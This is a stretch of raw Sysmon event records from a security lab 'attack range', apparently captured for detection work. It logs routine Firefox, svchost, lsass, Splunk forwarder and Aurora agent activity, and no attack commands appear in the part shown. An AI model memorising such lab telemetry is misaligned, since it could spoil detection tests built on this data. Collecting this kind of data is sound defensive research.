Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E48F-63C7-3006-00000000AF02}2428C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042252Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:40.220{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042251Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:40.220{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000016693Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:38.010{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50104-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016695Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:41.651{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F06DBC5C3D91C74BB3CE01A253411FDB,SHA256=79C8C51EBB416C991B466E60301466179BBCE8257182971C7EA0D5DA69783D93,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000042455Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.919{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042454Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.919{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042453Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.919{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042452Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.904{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E491-63C7-3506-00000000AF02}5804C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042451Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.903{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042450Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.902{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E491-63C7-3506-00000000AF02}5804C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000042449Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.899{FE4C2B44-E491-63C7-3206-00000000AF02}5212ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\shader-cache\startup_shadersMD5=D6D2ED5D04F852DF6DE64D851156FA78,SHA256=7A80E97C0CF5DF8403E3F1BF18CCF2D55B9D459F22FA40418E23762307ECDB82,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042448Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.898{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=107ACF8AE9307E5366A522286C490192,SHA256=B899F1A693102F2E84EE71E591461FA24B622A868BC9EF44251F32C0872D0425,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042447Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.886{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E491-63C7-3506-00000000AF02}5804C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042446Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.886{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E491-63C7-3506-00000000AF02}5804C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042445Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:41.883{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\LOCAL\cubeb-pipe-3296-1C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000042444Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:41.883{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\LOCAL\cubeb-pipe-3296-1C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042443Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.834{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-E491-63C7-3506-00000000AF02}5804C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042442Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:41.834{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\gecko.3296.6128.18261364109021588655C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000042441Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:41.834{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\gecko.3296.6128.18261364109021588655C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042440Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.834{FE4C2B44-E48F-63C7-3106-00000000AF02}32966128C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3506-00000000AF02}5804C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042439Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:41.834{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\chrome.3296.3.156121093C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042438Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.834{FE4C2B44-E48F-63C7-3106-00000000AF02}32963564C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3506-00000000AF02}5804C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042437Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:41.834{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\gecko-crash-server-pipe.3296C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042436Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3506-00000000AF02}5804C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e77459|C:\Program Files\Mozilla Firefox\xul.dll+e7653c|C:\Program Files\Mozilla Firefox\xul.dll+e78bb2|C:\Program Files\Mozilla Firefox\xul.dll+c2d887|C:\Program Files\Mozilla Firefox\xul.dll+c2ac3d|C:\Program Files\Mozilla Firefox\xul.dll+24fe6b|C:\Program Files\Mozilla Firefox\xul.dll+24f993|C:\Program Files\Mozilla Firefox\xul.dll+105ab0f|C:\Program Files\Mozilla Firefox\xul.dll+1882709|C:\Program Files\Mozilla Firefox\xul.dll+1880b50|C:\Program Files\Mozilla Firefox\xul.dll+c2d021|C:\Program Files\Mozilla Firefox\xul.dll+22fb48|C:\Program Files\Mozilla Firefox\xul.dll+1ff2ca|C:\Program Files\Mozilla Firefox\xul.dll+80a501|C:\Program Files\Mozilla Firefox\xul.dll+1859d07|C:\Program Files\Mozilla Firefox\xul.dll+1957601|C:\Program Files\Mozilla Firefox\xul.dll+1b5691f|C:\Program Files\Mozilla Firefox\xul.dll+1826987|C:\Program Files\Mozilla Firefox\xul.dll+1e7daf6 10341000x800000000000000042435Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-E48F-63C7-3106-00000000AF02}32966128C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3506-00000000AF02}5804C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042434Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042433Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042432Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042431Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042430Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E491-63C7-3506-00000000AF02}5804C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042429Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-E48F-63C7-3106-00000000AF02}32963116C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3506-00000000AF02}5804C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000042428Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.784{FE4C2B44-E491-63C7-3506-00000000AF02}5804C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3296.3.1561210930\1522179275" -childID 2 -isForBrowser -prefsHandle 3452 -prefMapHandle 3448 -prefsLen 31509 -prefMapSize 234522 -jsInitHandle 1112 -jsInitLen 246772 -a11yResourceId 64 -parentBuildID 20230112150232 -appDir "C:\Program Files\Mozilla Firefox\browser" - {22442e53-2cec-4865-89bb-54e0e7584cec} 3296 "\\.\pipe\gecko-crash-server-pipe.3296" 3260 1fb4318bb58 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x800000000000000042427Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042426Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 